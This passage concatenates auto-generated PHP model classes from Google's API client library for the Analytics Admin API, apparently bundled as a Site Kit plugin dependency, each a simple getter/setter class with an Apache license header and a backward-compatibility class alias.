GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue */ public function getToValue() { return $this->toValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessDimension extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDimension::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessDimension'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessRow extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'metricValues'; protected $dimensionValuesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDimensionValue::class; protected $dimensionValuesDataType = 'array'; protected $metricValuesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessMetricValue::class; protected $metricValuesDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaAccessDimensionValue[] */ public function setDimensionValues($dimensionValues) { $this->dimensionValues = $dimensionValues; } /** * @return GoogleAnalyticsAdminV1alphaAccessDimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } /** * @param GoogleAnalyticsAdminV1alphaAccessMetricValue[] */ public function setMetricValues($metricValues) { $this->metricValues = $metricValues; } /** * @return GoogleAnalyticsAdminV1alphaAccessMetricValue[] */ public function getMetricValues() { return $this->metricValues; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessRow::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessRow'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'resourceType'; /** * @var string[] */ public $action; /** * @var string[] */ public $actorEmail; /** * @var string */ public $earliestChangeTime; /** * @var string */ public $latestChangeTime; /** * @var int */ public $pageSize; /** * @var string */ public $pageToken; /** * @var string */ public $property; /** * @var string[] */ public $resourceType; /** * @param string[] */ public function setAction($action) { $this->action = $action; } /** * @return string[] */ public function getAction() { return $this->action; } /** * @param string[] */ public function setActorEmail($actorEmail) { $this->actorEmail = $actorEmail; } /** * @return string[] */ public function getActorEmail() { return $this->actorEmail; } /** * @param string */ public function setEarliestChangeTime($earliestChangeTime) { $this->earliestChangeTime = $earliestChangeTime; } /** * @return string */ public function getEarliestChangeTime() { return $this->earliestChangeTime; } /** * @param string */ public function setLatestChangeTime($latestChangeTime) { $this->latestChangeTime = $latestChangeTime; } /** * @return string */ public function getLatestChangeTime() { return $this->latestChangeTime; } /** * @param int */ public function setPageSize($pageSize) { $this->pageSize = $pageSize; } /** * @return int */ public function getPageSize() { return $this->pageSize; } /** * @param string */ public function setPageToken($pageToken) { $this->pageToken = $pageToken; } /** * @return string */ public function getPageToken() { return $this->pageToken; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param string[] */ public function setResourceType($resourceType) { $this->resourceType = $resourceType; } /** * @return string[] */ public function getResourceType() { return $this->resourceType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'values'; /** * @var bool */ public $caseSensitive; /** * @var string[] */ public $values; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string[] */ public function setValues($values) { $this->values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $acknowledgement; /** * @param string */ public function setAcknowledgement($acknowledgement) { $this->acknowledgement = $acknowledgement; } /** * @return string */ public function getAcknowledgement() { return $this->acknowledgement; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessBetweenFilter extends \Google\Site_Kit_Dependencies\Google\Model { protected $fromValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaNumericValue::class; protected $fromValueDataType = ''; protected $toValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaNumericValue::class; protected $toValueDataType = ''; /** * @param GoogleAnalyticsAdminV1betaNumericValue */ public function setFromValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaNumericValue $fromValue) { $this->fromValue = $fromValue; } /** * @return GoogleAnalyticsAdminV1betaNumericValue */ public function getFromValue() { return $this->fromValue; } /** * @param GoogleAnalyticsAdminV1betaNumericValue */ public function setToValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaNumericValue $toValue) { $this->toValue = $toValue; } /** * @return GoogleAnalyticsAdminV1betaNumericValue */ public function getToValue() { return $this->toValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessBetweenFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessBetweenFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaArchiveCustomDimensionRequest extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaArchiveCustomDimensionRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaArchiveCustomDimensionRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaCustomMetric extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'restrictedMetricType'; /** * @var string */ public $description; /** * @var string */ public $displayName; /** * @var string */ public $measurementUnit; /** * @var string */ public $name; /** * @var string */ public $parameterName; /** * @var string[] */ public $restrictedMetricType; /** * @var string */ public $scope; /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setMeasurementUnit($measurementUnit) { $this->measurementUnit = $measurementUnit; } /** * @return string */ public function getMeasurementUnit() { return $this->measurementUnit; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setParameterName($parameterName) { $this->parameterName = $parameterName; } /** * @return string */ public function getParameterName() { return $this->parameterName; } /** * @param string[] */ public function setRestrictedMetricType($restrictedMetricType) { $this->restrictedMetricType = $restrictedMetricType; } /** * @return string[] */ public function getRestrictedMetricType() { return $this->restrictedMetricType; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaCustomMetric'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @var string */ public $orderType; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string */ public function setOrderType($orderType) { $this->orderType = $orderType; } /** * @return string */ public function getOrderType() { return $this->orderType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'changeHistoryEvents'; protected $changeHistoryEventsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryEvent::class; protected $changeHistoryEventsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaChangeHistoryEvent[] */ public function setChangeHistoryEvents($changeHistoryEvents) { $this->changeHistoryEvents = $changeHistoryEvents; } /** * @return GoogleAnalyticsAdminV1alphaChangeHistoryEvent[] */ public function getChangeHistoryEvents() { return $this->changeHistoryEvents; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccountSummary extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'propertySummaries'; /** * @var string */ public $account; /** * @var string */ public $displayName; /** * @var string */ public $name; protected $propertySummariesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaPropertySummary::class; protected $propertySummariesDataType = 'array'; /** * @param string */ public function setAccount($account) { $this->account = $account; } /** * @return string */ public function getAccount() { return $this->account; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param GoogleAnalyticsAdminV1betaPropertySummary[] */ public function setPropertySummaries($propertySummaries) { $this->propertySummaries = $propertySummaries; } /** * @return GoogleAnalyticsAdminV1betaPropertySummary[] */ public function getPropertySummaries() { return $this->propertySummaries; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccountSummary::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccountSummary'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaExpandedDataSetFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $fieldName; protected $inListFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter::class; protected $inListFilterDataType = ''; protected $stringFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter::class; protected $stringFilterDataType = ''; /** * @param string */ public function setFieldName($fieldName) { $this->fieldName = $fieldName; } /** * @return string */ public function getFieldName() { return $this->fieldName; } /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter */ public function setInListFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter $inListFilter) { $this->inListFilter = $inListFilter; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter */ public function getInListFilter() { return $this->inListFilter; } /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter */ public function setStringFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter $stringFilter) { $this->stringFilter = $stringFilter; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter */ public function getStringFilter() { return $this->stringFilter; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaExpandedDataSetFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaGoogleSignalsSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $consent; /** * @var string */ public $name; /** * @var string */ public $state; /** * @param string */ public function setConsent($consent) { $this->consent = $consent; } /** * @return string */ public function getConsent() { return $this->consent; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGoogleSignalsSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaGoogleSignalsSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression extends \Google\Site_Kit_Dependencies\Google\Model { protected $andGroupType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList::class; protected $andGroupDataType = ''; protected $filterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilter::class; protected $filterDataType = ''; protected $notExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression::class; protected $notExpressionDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList */ public function setAndGroup(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList $andGroup) { $this->andGroup = $andGroup; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList */ public function getAndGroup() { return $this->andGroup; } /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSetFilter */ public function setFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilter $filter) { $this->filter = $filter; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSetFilter */ public function getFilter() { return $this->filter; } /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression */ public function setNotExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression $notExpression) { $this->notExpression = $notExpression; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression */ public function getNotExpression() { return $this->notExpression; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListAccountsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'accounts'; protected $accountsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccount::class; protected $accountsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaAccount[] */ public function setAccounts($accounts) { $this->accounts = $accounts; } /** * @return GoogleAnalyticsAdminV1alphaAccount[] */ public function getAccounts() { return $this->accounts; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAccountsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAccountsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListAccountSummariesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'accountSummaries'; protected $accountSummariesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccountSummary::class; protected $accountSummariesDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaAccountSummary[] */ public function setAccountSummaries($accountSummaries) { $this->accountSummaries = $accountSummaries; } /** * @return GoogleAnalyticsAdminV1alphaAccountSummary[] */ public function getAccountSummaries() { return $this->accountSummaries; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAccountSummariesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAccountSummariesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaMeasurementProtocolSecret extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string */ public $secretValue; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setSecretValue($secretValue) { $this->secretValue = $secretValue; } /** * @return string */ public function getSecretValue() { return $this->secretValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaMeasurementProtocolSecret'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the 